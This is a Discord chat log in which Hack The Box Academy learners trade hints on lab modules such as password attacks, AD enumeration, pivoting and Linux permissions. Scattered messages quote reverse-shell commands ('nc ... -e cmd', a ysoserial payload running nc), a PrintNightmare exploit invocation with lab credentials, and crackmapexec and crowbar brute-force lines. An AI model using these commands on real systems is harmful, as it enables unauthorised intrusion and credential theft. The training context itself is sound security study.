#modules

hahah wth

any mental problems

@autumn pilot I'm about to release a 30 episode series on the htb academy job path its not against the very clear content guidelines that i for sure read yeah?

So r u guys into automation or Game Creation

can you give me some context

thanks for the contribution HAHAHAHAHA

none XD

Didn't you ask a similar question three months ago?

#cwes message

for random stuff go to #general btw

that chat is funny

lol what is going on

They need to read #welcome and acquire basic reading comprehension skills first

I don't even remember when I joined d server

difficult task

How I hack and mine for fish?

September

Wow just want to get me off rhe server right

I can't really think of a use for -w - other than seq a b tbh

check the cook

project

i shared the git

I mean if you read #welcome you can figure out how to access more of the server

sheesh my server time is going to end before I get result for https://academy.hackthebox.com/module/54/section/511 this question - One of the pages you will identify should say 'You don't have access!'. What is the full page URL?

Then you're likely doing something wrong

Ah thank you, good to know

Most academy stuff doesn't take more than the initial lifetime of the target

So I created A Game and want u guys to rate it It is a very basic Game

good to know

https://tenor.com/view/radar-searching-looking-checking-checking-the-radar-for-someone-who-cares-gif-17788490

U r so negative to me

import pygame
import pytest
import time
import random
pygame.font.init()

WIDTH, HEIGHT = 800, 640
WIN = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Space Ranger")

BG = pygame.transform.scale(pygame.image.load("Bg Img.jpg"), (WIDTH, HEIGHT))

PLAYER_WIDTH = 40
PLAYER_HEIGHT = 60
PLAYER_VEL = 5

STAR_WIDTH = 10
STAR_HEIGHT = 20
STAR_VEL = 3

FONT = pygame.font.SysFont("comicsans", 30)

def draw(player, elapsed_time, stars):
WIN.blit(BG, (0, 0))

'''pause_text = FONT.render("Pause", 1, "white")
WIN.blit(pause_text, (10, 50))'''

time_text = FONT.render(f"Time: {round(elapsed_time)}s", 1, "white")
WIN.blit(time_text, (10, 10))

pygame.draw.rect(WIN, ("red"), player)

for star in stars:
    pygame.draw.rect(WIN, "white", star)

pygame.display.update()

This is half of it

Amazing game

0 for the use of comic sans.

loved it, better than overwatch

Gta6 who?

lol BG = pygame.transform.scale(pygame.image.load("Bg Img.jpg"), (WIDTH, HEIGHT))

def main():
run = True

player = pygame.Rect(400, HEIGHT - PLAYER_HEIGHT, PLAYER_WIDTH, PLAYER_HEIGHT)

clock = pygame.time.Clock()
start_time = time.time()
elapsed_time = 0

star_add_increment = 2000
star_count = 0

stars = []
hit = []

Even better now

Imagine thinking it's a good idea to make a game with python.

Tell that to EVE

The servers aren't the game though.

The game uses Python too

How do I post a file here

hello y'all, anyone who can give me a hand with a Java issue?, a bit of context: I found in exploitdb the exploit 44553.py but when I run the command java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040' I'm receiving this Java error

Hi, I'm on Login Brute Forcing - Skill Assessment Service Login.
1st Question: " As you now have the name of an employee from the previous skills assessment question, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag."

I have a question about the username but I don't want to spoil it here neither with spoilers, can I DM someone about it?

course I pointed to my PC not 10.0.0.5

#modules

Oh, that's here

Great.

😛

Sorry, I thought I was in general 😅

no worries ^^

Is that part of a module @dull thistle ?

Yes " Login Brute Forcing "

God damn it, @tight mesa I meant

Ok I should just quit

All good 😛

I'm failing so hard.

Happy to answer any questions @ocean night ! 🙂

sorry don't understand

hes asking if your java exploit question is module related

I meant is the question you asked related to a module?

Feel free to DM, can't spoil but if I can answer the question without spoiling I will do

😂

oh sorry @ocean night @thorn urchin , yes my question is related to Other Notable Applications, more exact about question 2

the RCE access

I'm pretty sure you don't need to use ysoserial unless you're doing the Deserialization Attacks module

Can't DM you because of your settings 😭

Accepted

ok., understood maybe I need to search for a different exploit instead, thz btw

I know the answer to this but my scan is still running and I didn't get to the ||linux php7 || page. I wnet recursive 1 should I have done recursive 2 or 3?

¯_(ツ)_/¯

Have you tried it?

yeah just impatient

not a ffuf fan

i found it in less than a minute xD

no my scan hasn't found it my googleFu did lol

wuot

I answered the next two questions and my scan is still running.

just found it -

amazing bro

That was a good ten minutes

leet hacker skillz

any hint?

module?

attacking common apps?

guys anyone have a path to start in HTB machines and acadmey ( Free Machines And need a path in the academy that wont require me paid boxes later ) i really want to start in all field of hacking ( Web / Crypto / Low Level )

yup, Other Notable Applications

you dont need ysoserial xd

the vuln is under weblogic

learn assembly, then C#, then python or javascript and PowerShell

you noticed that i asked for a path FROM HTB

that means when answering me you should provide me with source FROM HTB

searchsploit weblogic and one of those works

just stick to academy

ignore boxes xd

is starting in machines better ?

they will always be a source to practice specific attacks

If you head over to https://academy.hackthebox.com, go to Modules and filter by Tier 0, you'll see plenty of content to get you started

I agree, get some fundementals first

I haven't installed searchploit, that's why I'm using exploitdb

Machines tend to require some prior knowledge and experience

its the same

I know

one of the exploits for that weblogic version under exploitdb will give u the flag

Starting Point on https://app.hackthebox.com is also a good place to start 🙂

no.

Hi I'm on the Linux File Transfer Module and I'm curious on why we must have a self-signed certificate for our python web-server.

we do not.

just in case we want the communications to be encrypted

I already know how to install most of linux ditros, troubleshoot them install windows and troubleshoot it and understand how networks works in basic level and what a lot of tools in cybersecurity used in offense and defence and a good understand of electrical engineering and also web technologies and how it works

but almost all the exploit are referred to Desearialization RCE

and many attack surfaces and types

head over academy

nothing else

Check out some social channels like ippsec and 0xdf too.. they do awesome walkthroughs, including tooling and process.

just start and aim for some certification

yeah they are informative

dont try to find the perfect path

oscp not a good start ?

yes it is a good starting cert

if u cn pay go ahead

perfection is imposable

Hi everyone

am still 16 lol

cool

just start

oh ok cool thanks!

thnx man will see

Hey guys would anyone be able to give me a hand on AD enumeration & attacks ACL Abuse Tactics. The task is to follow the steps above and set the user adunn SPN so you can kerberoast but I keep getting failed user damundsen doesn’t exist? Thanks

@sly dome 48971.py?

The module describes a tool you should be using 😉

Not that there's an exploitdb entry out there as well, but yeah

Been stuck on this question on WINDOWS EVENT LOGS & FINDING EVIL for forever: "Utilize the Get-WinEvent cmdlet to traverse all event logs located within the "C:\Tools\chainsaw\EVTX-ATTACK-SAMPLES\Lateral Movement" directory and determine when the \*\PRINT share was added." I've read through the module multiple times, tried all the commands I can come up with, went ahead and looked through the event viewer any nothing. Any suggestions?

iirc, it took you that long because you didn't do it correctly.

hmm, what's missing? -|| ffuf -ic -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://faculty.academy.htb:42112/FUZZ -recursion -recursion-depth 1 -e .php7 -v -t 80||

clunky syntax

I don't know why you're running it like that, but maybe I misread what you posted.

iirc you were supposed to find the one extension that is not used on the other domains, and then enumerate from there.

let me check my notes

oh that's why

I'm not figuring out what tool do you mean, I read Other Notable Applications section once again and not catch it

I misunderstood, should of read slower. I tried to scan all the subdomains at once, then tried to scan every extension. I did cancel the thing multiple times.

I found the default creds and got access to the app

Hey. Were you ever able to figure this out?

From my notes: directory-list-2.3-small.txt has 87664 words... two sites have two different extensions while the third site has a third. If you don't pick up on using the third site + third extension, you would be waiting on 701312 searches.

wow good note taking

thanks, that explains why it took so long

I honestly think the example given is both realistic and a bad example

Hi ! I'm stuck on Privileged Access in AD Enumeration and Attack. I try to do this question : "What host can this user access via WinRM? (just the computer name)" I just try everything and impossible to find this f*cking host.

I tried :

-> Cypher query provived in the course = KO
-> With Powerview = KO

I tried to find another cypher query or another methods to have this info : impossible to find it.

Do you have an idea ?

Which skill assessment step? There are three

@ocean night are you using bloodhound to answer this question?

I'm not answering anything 😅

no, no, it's not related to the skills assessments, is related to Other Notable Applications

Ok let me just DM to stop spamming here

ok.

Hunting Evil with YARA (Windows Edition)

have you tried looking for that string in all logs?

@ocean night can i DM you shortly? would love to get your feedback about something

Depends what it is 😅

just a link

🙈 ok, but I reserve the right to run as fast as I can

surely

fix: move files out of folder

Bad rulesets then? 😦

yup

the shell_detector.yar, idk what it was yapping about, but seatbelt.yar indeed had an empty string

Anyone done malware analysis module?

why is the linux fundementals module so damn confusing

haven't done it yet but what are you confused over?

Some of the stuff isn't well explained for the questions, but at the same time some rtfm helps

It jumps all over the place.

it feels like a lot of the tasks dont come with the how to's

like i'll find the solution through this server or through google, and the very next thing teaches me the solution i just learned from google

atp im gonna redo all the tasks after finishing it

htb is an amazing resource, especially for being available freely, but i just wish it was structured a bit differently

Linux funds is the only one that bounces like that

The rest are contained per section

ohhh okay okay thats good to hear

It's more about, take the list of commands they give you and apply some thinking

Which does still apply to the other modules

that parts fine, but in the module im currently in most of the commands they give me havent been explained

They give a brief overview of the commands in the section that lists them

the Permission Management section is confusing me

What's confusing about it

7|7|7; self|group|others

What's the best way to report typos in academy content?

#858470491676737536

I'm on Command Injection->Identifying filters and answer the question at the end for which item is not blacklisted. I have in burp that|| & ||is not filtered but still says i'm wrong. What am I missing? https://academy.hackthebox.com/module/109/section/1035

-rwxr-xr-x i dont understand reading these

• indicates if it's a directory or not (if it's a d, it's a directory) then you have a 3 octal set of permissions. r = 1, w=2, x=3

I remember hating the idea of ever learning how that permission format worked

Add them together to get your permission set

accurate

4=r-x which means read and execute permissions

The first set of three indicates user perms

Second set indicates group

chat gpt goated

there's stuff besides d too

Third represents everyone else

Keeping it basic

If it's an s then it's part of the challenge /s

bruh wth

For most purposes you don't need to know about sticky bit (which replaces the execute bit)

Sticky just means it executes as the owner file owner

-rwxr-xr-x

so the first portion is for owner
second portion is for group (non guests on the machine to my understanding)
and the last portion is for people who are guests on the machine

idk im not sure what the difference between group and other is

symlink l another one of the first column?

Groups are just a set of users

Thanks I knew I forgot something

ohhh so thats js something thats mentioned and not explained?

Everyone else (the last section) is everyone not defined within the owner / group section

For the purposes of basics, it's not necessary

ahh okay okay

Group would be like windows group sets like administrators/etc

Or system

so what's bianary notation

The cool way where it's numbers instead of letters

ohhhhhh

i just understood

W

is that necessary to be able to use?

like i understand the concept, but i cant imagine it being useful or faster

unless i memorized all possible combinations

Worth knowing both since you'll see both in different contexts

You only have to memorize what each number represents

421
rwx

Then just know that each of the 3 numbers represents a section (owner, group, everyone else)

421
rwx

x3

Each column (of e.g. chmod 754 bleh), is a representative of what each section of users can do. 7 in binary is 111, so the user can rwx.. 5 in binary is 101, so the user can r-x (- denotes no permission).. 4 in binary is 100, so the user can r--

I think that's right anyway

Owner, Group, Everyone

I second

i feel like 421 is a little easier to translate in my head, is there any benefit to remember the bianary?

It's shorter

rwxrwxrwx == 777

No need to remember binary tbh

4+2+1 = 7

And chmod is easier because it's shorter

That's my main use

IIRC you can create a file in a directory without write permission, but can't write to it

or something like that

It's really weird

Gonna have to dig through my notes to find that reference

Ok no, not that.. what was it then

https://unix.stackexchange.com/a/317446

Had it in a vulnhub machine ages ago, and it felt really weird

God damn what was it.. maybe rename?

001, 010, 100 would be the binary for 1,2,4

You just turn a bit in that sequence on/off

for htb, switch everything to 777 /s

short question, where do i find server and port ?

For one of the challenges?

For the labs you're generally gonna be given an ip and/or port to attack

Format: ip:port

Lol good luck if they only give you a port

Hi, I'm working on the Easy lab of the skill assessment in the Password Attacks module. I've discovered two services, and with no further information/hints the only solution is bruteforcing :(. I'm using the username and password list provided in the module, and I wondered if there is any way to optimize it? Like bruteforcing the usernames first and after finding the right username, bruteforce for the password?
In previous lab I was able to avoid bruteforcing through the whole username list because we had access to the machine earlier and I could extract the possible usernames from there, which allowed me to narrow down the search dramatically.

I haven't done that module, but with my experiences in the modules you usually have to use a different but similar command / input, in this case your wordlist

Okay, but generally, is there any way to bruteforce usernames alone?

Yuh

Are you thinking of testing a list of usernames with a single password?

Yeah, to validate which users exist on the service, but I don't think that's possible because hydra only gets a hit when there's a successful login attempt

Ah

Yeah generally it's bad security to provide feedback on whether or not a user exists

To avoid user enumeration

Make sure you can't just do a null login ;)

yeah I gussed so

I dont recall that module too well

Lol

Did you solve this task? I have already identified the kind of malware that was running, but I can't seem to find the correct answer

I would think the best approach in this scenario would be to use a short list of passwords in combination with a list of common usernames

But I should see if I can read the module to give better advice than that

You're given wordlists you need for that module

Use them 🙂

Yep, this

can someone give me a hint or advice as to why this won't execute correctly? I am trying to complete the last question of the bleeding edge vulnerability section

Missing library perhaps

same as u, i am not clear about the question.....or did u solved it?

Thanks, I know, but the bruteforce process takes half an hour with the vanilla user& password list, and 111hr with the mutated password list, so I wanted to see if there are any possible optimizations to this long process

show me your smbclient.py command

Check any parameters regarding multithreading, doubt any mutation needed on an Easy section

For example, in bruteforcing the right username intially, and then with one username bruteforce the password, which might make it exponentially more efficient

@sly dome can I DM you everything i did ?

you have the -u flag in hydra

no

just show me your smbclient command

Always try to imagine what the easiest version of a technique would be when trying to find a solution

You can bet money that the easy section of anything in HTB won't require more than minimal compute power

@sly dome ||sudo smbserver.py -smb2support CompData /path/to/backupscript.dl||l

yea dont do that

instead change path to dll for the path to directory where the dll is

ok

Thanks for all the suggestions!

@sly dome still not working when trying to run this -|| sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\172.16.5.225\CompData\backupscript.dll'|| - thoughts?

btw to tell windows to fetch a smb file you must use \\ at the beginning

@sly dome so i do have that - think when pasting it removes it - but i have '\ followed by the IP...if my dll of backupscript is in th ehtb home directory should i really be running smb from there or some other directory and since it is running form there do i need to supply it with /home/htb-student/.dll?

bump? https://discordapp.com/channels/473760315293696010/774040263278592041/1186784839354023987

Will DM you

it doesnt matter

if ur running from the current directory and its there u can just do $(pwd)

dont use the file in the path

thats an error

if its on htb-student’s home

you just put /home/htb-student in the smbclient command

@sly dome So when I run I get this error....

Traceback (most recent call last):
File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 188, in <module>
main(dce, pDriverPath, options.share)
File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 636, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 880, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.

the error is clear

either the directory is wrong or the dll name

ok - let me retry based off that advice - ty

typo? YARA and Sigma rules... This section is about Sigma

See you posted in erratum also, it'll be handled. Thank you ❤️

i did, but now I"m not sure if I"m being stupid. so I'll just leave it up here

Honestly I'm not sure either, but it does seem to contradict itself

Ok so on detection matches with OR, and another with AND?

it did, but then I kept reading and it mentioned it different later on, so it might just be me missunderstanding

What's right is that it is confusing tho and should probably be moved a bit below for more clarty

Could be split up for clarity yeah

Ok bed time, nn 👋

night

Hey guys, Ive got a question, just completed the skill assessment of the File Upload Attacks and I got the right payload quickly but it took so much time to figure out why I wasnt getting a sensible response from the server - without spoilers, after ||reading the source|| and figuring out "everything" I crafted a payload, but for some weird reason was getting this response, until after prepending the payload with another payload(spoiler) it finally allowed me execute commands. Would love an explanation, thank you very much

https://tenor.com/view/gojo-gojo-satoru-gojo-season-2-hip-thrust-reaction-gif-10399129046512126318

nerd

Nerds are cool.

what do you guys do when your eyes get tired

also, how should i pick what modules to do next

Shower or sleep, caffeine will just make you crash harder. As for modules, depends what you're interested in.

im gonna run my head under cold water

This is not allowed. Please read #rules and #welcome. As well, please stay on topic. Thank you.

understood, thank you for telling.

i wanna ask smth about the "windows credentials hunting" section in password attacks module

the question that asks for winSCP password, is there a way to get it without the 3rd party tools, like lazagne.exe?

I am confused as to why Mimikatz works but the normal Powershell does not when dealing with smb. Both Powershell and cmd.exe are being "ran" under the same user in this context. This is for Password Attacks > Pass the Hash (PtH)

never did the module. but perhaps it's has applied a kerberos ticket to the session impersonating an admin on DC01 (a different computer) hence why it works, perhaps? maye someone can answer better

Yup, Lazagne is just a tool with all collection techniques compiled together. So you can search for blogs for the manual method or best read the source code for Lazagne to see how it particularly extracts the WinSCP Password.

will search into that

This module uses NTLM. I read the following on a site but do not fully understand how using and then replacing fake information helps.

Mimikatz can perform the well-known operation ‘Pass-The-Hash’ to run a process under another credentials with NTLM hash of the user’s password, instead of its real password. For this, it starts a process with a fake identity, then replaces fake information (NTLM hash of the fake password) with real information (NTLM hash of the real password).```

https://blog.notso.pro/2020-05-09-offops-in-ad-1/

Well, a ticket is requested when an authentication is attempted against the DC as far as I know.

The reason you can access it through mimilatz is because you are authenticated in the session (impersonating) a user with the necessary privileges

Certainly there are alternatives, but if the module recommends it then it's a tool you can use

Ah I see, that makes sense. Appreciate it.

@regal stream If you did a klist on both sessions, you'd see the difference that the service tickets has on each of them. I'm not exactly sure, but I guess when doing pth, Mimikatz automatically requests and injects the ticket into it's session I believe. Like what @supple gorge said (correct me if I might be wrong)

Nothing wrong with relying upon tools made by others, they can be part of your toolkit. Doing things from scratch is very gratifiying, but make use of the tools avialable.

Did you sleep only for 2 hours or didn't sleep at all? xD

yeah i tried to get it manually but werent able so went on to use the tool

I had a nap, woke up and couldn't get back to sleep, so thought I'd work instead

AWS fun times

I also thought it weird that after wishing goodnight you popped right in. It's my turn to go on the goodnight train. Hopefully I stay there until tomorrow lol

nn, have a good sleep 🙂

Im having trouble understanding what i need to change for submitting the url in the xxs phishing lab i have created the malicious url and set up a site to redirect to the malicious url and put that through bitly i cant seem to get this url to send without getting "Issue in sending URL!"

bitly?

Take a step back, do exactly what was explained in the section, your payload should get rid of the form on top of yours(I dont think you would get a response if you have 2 forms on a page), pass the url of the page where your injected form is at to the input field on the submit page and wait for a response on your php server. Stick to techniques taught in the section... Saves you the mental trauma, you absolutely do not need bitly for anything.

absolutely no response? try to reset the machine (that also looks like a very inapproriate vhost name)

Wrong URL.

Hmm I've tried many different even with .academy. so not sure where I went wrong with that

It should work - Try a reset and use the right vhost, run the first time to detect bogus param names run a second to filter those.

How to exploit string comparision in a PHP site

Depends, if its a login page - You could test for the use of loose comparism instead of strict comparison (that would give you a type juggling vulner you can abuse to bypass the login page)

How to view the PHP of the login page

Any software?

lol of course you dont have access to that, its on the backend server itself. - Unless its a whitebox test or you found a way to read that.

Can I DM you for a sec?

You dont, you pass an empty array as username/password, read up on that and play with burp.

Alrighty.

Thank you

👍 send FR

Youre welcome - Altho this channel is for academy modules, mods are probably not around, you should take this to the "general" channel next time.

Okay

Where is the general channel

Here #general
If you have no access, read and follow #welcome

hey guys can anyone help me with the password attack module hard lab i am not able to find crack the password of johanna for the intial foothold i tried CME to password spray for user Johanna and used the mutated password list ... thanks

Hi, can anyone nudge me in the right direction of the medium lab of password attack module? I am on dennis and can't find a way to privesc

Did you try a generic password list instead?

Why don't you save his ssh key for later ;)

I've never seen this kind of reuse, guess that a first time for me. Thanks!

The question to ask: why is there a password?

You're right, when I thought about this it seemed strange and that's what led me to try it

did you mean the one provided in the resources then yes

No, I meant like rockyou (but a smaller list)

oh ...thanks let me try

I have a qquestion in the Skills assessment when pivoting to the second into the 2nd subnet. I have done the pivoting the way the course has taught me. But now I am wondering how I would connect back using ligolo. If I have the agent on the internal network meaning 172.x.5.x and would want to connect back to my proxy. How would I do that? Which IP would I have to type. Given that its not connected to my own network?

meaning from the DC back to ligolo

double pivot? open a listener from the first subnet to the ligolo server port on your attack host, then connect the ligolo agent in the second subnet to that listener in the first subnet

Can I dm you?

yes thats what Im trying. But that listener in the first subnet. Do I have to run another proxy? say thats windows host. How do I run that listener back to the attack host. I feel stupid asking this, its like Im completely forgetting something

you need to run the listener on a host that has access to both subnets

found it. That was turning me mad

What's going on with the introduction to digital forensics module? The spawnable instance doesn't have the things mentione in the section

I can't spawn a machien for the life of me.

rip, refresh page and reset, I think some recommended changing the thing from udp to tcp. what section you haggling with?

i just got one finally.

took about 15 mins. im using pwnbox cuz i tried for hours last night and couldn't get the exploit to work

is that for win attack and defense?

good thinking on using the pwnbox, hope it works

Yeah. last section

got it to load but

THis section has been a real fucking pain in my ass

You ok if i send you a dm?

sure

Is there someone that have finished the Advanced XSS and CSRF exploitation module ?

Probably

I need just a small tip on the last exercise... struggling to find the correct parameter name for one of the api endpoints

Have you managed to bruteforce the password for Johanna?

hello 🙂
i am new here
i have a problem with the section about DNS enumeration, on the path to CBBH
https://academy.hackthebox.com/module/144/section/1256
I have completed questions until now,
"What is the FQDN of the IP address 10.10.34.136?"
this question is about a private IP adress that i cant ping,
there are no records with "dig any 10.10.34.136"
no records either with nslookup, whois specifies that this kind of address is only for private networks, so if there are no records on the network's DNS, how can I retreive any information at all ??
thanks for your help !

because the question is mildly misleading if you're not sure how you're meant to get the answer

you're supposed to dig against the target IP, not the IP in the question

also dig axfr will net you better results than any

i tried also with @ns.inlanefreight.htb at the end

again

and also with dig axfr

if you don't have inlanefreight.htb in your /etc/hosts

it's not gonna know

because .htb isn't a valid/registered tld

it's there...

you can do @IP

the target IP is the spawned IP from the button "click here to spawn"

here you can see that there are 0 answers when i run the command

facepalm

dude

you're not getting the point

dig axfr inlanefreight.htb @ip

look for that IP in that result

oh
i will try that

if not dig through one of the subdomains

@fathom pendant Can you give me a clue about the johanna password bruteforce? Tried general and popular password lists and haven't found anything. Currently using mut_password.list and it is taking ages.

i don't recall which list i used

First letter of the password if you recall/can check? Just to see how close I am. It's supposed to be in this mut_password.list

i don't recall and don't feel like getting up to go look

just have patience

What's your command, put it in spoilers

the ip for the specific question is different from the one i spawned, witch i used as DNS for all the other questions

yes.... that's because the IP will be ON the DNS records

How can I put something in spoilers?

You need two of these on each side of your message -> ||

||spoiler||

||First I tried with CME but it took ages: crackmapexec smb $IP -u johanna -p mut_password.list and then I looked at HTB Forums and someone suggested to bruteforce RDP because crowbar is much faster so I tried: crowbar -b rdp -u johanna -C mut_password.list -s $IP/32 -v||

try bruteforcing the user against a different service

wait my mistake

i never used crowbar for this fwiw

Yeah, cme will work, you do need the mutated list you were using, but you're missing the --local-auth flag, its explained earlier in the module

^

Oh, I'll look at it, thanks!

windows is weird about it

How long is it supposed to take approximately? tired of just waiting for it to find the password

After you add that flag, it'll be a few minutes at most

Okay, tysm

note you can go one more level deeper (look for 127.0.0.1)

all about understanding what you can do

also the screenshot reveals some of the answers i believe for other questions

so i should delete

yes

as stated though: it may not be on the initial dig - always look if you can go deeper - in this case you can dig one more subdomain in

Im assuming you ended up getting this. If no DM me.

i finaaaaly got it !! thx i was blocked since yesterday xD

I got it dw

i would be devastated to be stuck on something for 2 months ngl

I still didn't get the password 😦

Actually no I dont have it

I ran the listener. But on the internal network, what IP to I type. Im supposed to put my attack IP as per every guide out there but there is no route between them from the internal network. So how would it know to connect to my attack IP ?

@fathom pendant could you maybe input on this

Im having issues with double pivot on Ligolo.

haven't used ligolo yet

so no

oh fair enough

anyone?

if you don't have a route between the host and your attack box, how are you getting a shell?

no @languid wharf still no progress yet

Can I dm u?

yeah sure

how do I know where the path is for the user's email in linux?

Strange, that should have worked, it's not far down the list

env

First letter? Just to get an estimate about how far down it is. Maybe my machine works really slow but I don't think so

ah thanks

I get that. So for example when on the Internal machine I connect back to ubuntu with nc and forward that port to my attack machine, then I get a shell. But when I try to execute the agent on the internal windows machine and connect back through the ubuntu then I see connection refused on ligolo

oh do I have to set another agent on ubuntu too?

starts with ||1||, double-checked my notes and it should be working, maybe something broke, try restarting the target

idk what ubuntu or windows machine's ips are and their subnet

I'll try it, thanks. ||1 as in the first 1000 passwords or so?||

as I've said, open a listener on the pivot host of the first subnet to the ligolo server listening port, then connect the agent of the second subnet pivot host to that listner of the first subnet

as in first character of the password, would have to boot up my VM to check what position it is, I just recall it only took a couple of minutes

Okay, thanks for the help

okay I will go through it very slowly again

yes that is exactly what I am doing... I get this ERRO[2649] dial tcp 127.0.0.1:11602: connect: connection refused

what's the proxy server listening port

so Ive deleted all listeners and started over
│ AGENT │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
www-data@inlanefreight.local │ 0.0.0.0:11601 │ 127.0.0.1:11601

no I have to do ./agent.exe -connect UbuntuInternalIP:11601 -ignore-cert

correct?

on the Windows machine, because they both share a network

if the windows machine can connect to the ubuntu machine, and ubuntu has a listner running then yes

so I have to put the proxy on the ubuntu machine too, and then from there start a listener? That would be weird. having the listener EXACTLY like ive tried but with a nc reverse shell it works

but when I try to connect back with an agent I get connection refused

no the proxy only runs on your attack host

nc 172.16.5.15 11601 -e cmd

so this works and I get a reverse shell

but this doesnt

./agent.exe -connect 172.16.5.15:11601 -ignore-cert

you didn't answer my question, what port was the proxy listening when you started it

oh

5555

there you go, agents need to connect to proxy port

-------------------...................----------------------------
let me try

@hallow kiln Restarted the machine, CME has tried all the passwords that start with ||1|| and it still doesn't work : (

try to enter from the pwnbox ( it is faster the bruteforcing ) and run the mutated list

I'll try, thanks

okay no thats confusing. So what you are saying is do this ?

./agent.exe -connect 172.16.5.15:5555 -ignore-cert ? Then what did I set up the listener for

Im sorry if Im being slow here

Im sure once it works Ima hit myself

open a listener on the pivot host of the first subnet to the ligolo server listening port

done

www-data@inlanefreight.local │ 0.0.0.0:11601 │ 127.0.0.1:11601

your server listening port is 5555

oh

I see yea right

let me try that

ah that makes sense

I hope that works

connection refused

jesus christ what is going on

My lab also crashed

@torpid zinc it worked! Thanks! Do you know why it might've failed from my vm?

not to be honest, maybe because of the connection but not sure at all

Okay, thanks for all the help everyone!

Hello together 🙂
Could someone please help me with intro to assembly language : shellcoding tools?
It doesn't work either with msfvenom nor when I wrote a Script in an asm- File.
The parts which are needed are in this Section, I know and based on that, I wrote a Script, but that doesn't seem to work. Could someone please help me? Maybe, that I send the parts which I figured out per DM? I am for sure only overlook a small detail, but don't get it, so could please someone help me with this one, where I stuck for countless days. 😦
thanks a lot

Could someone help me?

I'm currently doing SECURITY MONITORING & SIEM FUNDAMENTALS.

Now the funny Part is, in Module 9:
SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe)

I get the Task:

Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Extend the visualization we created or the "User added or removed from a local group" visualization, if it is available, and enter the common date on which all returned events took place as your answer. Answer format: 20XX-0X-0X

I build the dashboard but as soon as I use the timestamps I don't get any more records as there isn't any newer entry then 05 March 2023...

I did it as shown in the guide.

Is there any bug or something?

are you using all time?

Do you see the different dashboard with the different sections? That should already be pre made

ls -la

Het all I am struggling with the JavaScript Deobfuscation question. The answer that I have looks correct as in it is in leet speak but I keep getting an incorrect response

are you sure you're answering the right question

read carefully

Thanks, worked with the pre build !

leet speak?

are you sending a POST to web server?

@fathom pendant I have no idea. I have tried naming the type of encoding pasting in various commands that I used to decode. The question isn't really a question

@supple gorge I am

what are the routes

read the last part of the question, what does it say to do? are you doing that?

I did that yes to the best of my ability

so you did 2 POST requests?

That is where I am lost can I DM you

I am on the Active Directory Module Section "Internal Password Spraying - From Linux"

What Username list should i use here ?

sure, if you're unsure how to do what the quesiton is asking, it was done in the section a bit above

@supple gorge sent

explain more why it's not working

I was so silly, I'm used to crypto and decoding so I was like wtf, how is this not the answe,r trying to figure out what encoding i was missing.

Turns out I was missing a step 😅

@supple gorge Thanks for the assist

reading the actual question? (was it the Source question?

it was the one that you had to get the decoded answer and send it in a post

ah yeah

Thank you both

the one you decode from the previous question

This why I love HTB because it is a pain to learn this stuff but I now completly understand the concept behind it

i have a question for the hard lab in password attacks module ( i will add spoilers because i am not sure if it is or not ). || After you find the backup file, how can you identify that is encrypted with bitlocker? ||

Hi everyone, I'm currently doing https://academy.hackthebox.com/module/115/section/1139 (The live engagement), working on the 2nd machine (blog.inlanefreight.local), while I understand how to exploit this, I wonder how you would get these credentials without the hint here, are we meant to for example just run burp on the environment and brute force it with a random wordlist? Did not think this was the way as the speeds are also pretty slow on this machine.

file *.vhd

iirc

or you just try mounting and find out the hard way

nvm I'm stupid I didn't check the desktop 🤦🏼‍♂️

check the desktop

LMAO

you wouldn't believe how many people ABSOLUTELY miss it

glad I'm not alone 😂

okay it worked ... FUCKING FINALLY

but does that mean that every .vhd file is encrypted? i thought it is not a fact

...

there's literally a command called file

i tried it but the output is the following "Backup.vhd: DOS/MBR boot sector MS-MBR Windows 7 english at offset 0x163 "Invalid partition table" at offset 0x17b "Error loading operating system" at offset 0x19a "Missing operating system"; partition 1 : ID=0xee, start-CHS (0x0,0,2), end-CHS (0xf,254,63), startsector 1, 4294967295 sectors"

maybe because there are the errors in the output you can understand that something is wrong? but still i dont know if it is a logical conclusion to think about bitlocker

you can also make a logical conclusion (based off it being windows) and it being named a certain way that cracking it would be necessary

hmm okay thank you very much

Anyone got an idea? still stuck at the question:
Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer.

is it possible that the linux fundamentals module provided the wrong password/login for SSH in the "system information" section :)

Hi guys still stuck on starting a web server with php, I'm using this command: php -S localhost:8080, any hints?

it should work

am i using the wrong IP for SSH then

you should be using the ip from "click here to spawn target"

what module

Hey guys, I'm stucking in a lab "Skills Assessment - WordPress", I've set the /etc/hosts to ping to the server's ip but it isn't working, any tip?

This is the working with web services module

thats the IP the instance is running on right 😭

like the one that shwos in my terminal

no

oh!

this IP

should have paid better attention in the getting started module

ty

pebkac

Hi for bash scripting
what am I doing wrong

get a list of users in the domain

I tried putting then in the next line

isn't there a thing with echo that causes it to add a newline

\n?

ye echo by default tags a newline - try adding -n (to the initial encoding?)

I dunno about that. This is all thats mentioned in the module

¯_(ツ)_/¯

found the error, a blank is needed between if and [

you mean a space

can someone let me know why this won't work here? I imported AD, but still nothing...would I need to use powerview?

you might need to import powerview

but also it tells you that the perameter you described does not exist

powershell does support tab autocomplete

ok...maybe that is why

that's the ActiveDirectory module, not powerview

but even when trying to run what is outlined in the text it won't work either

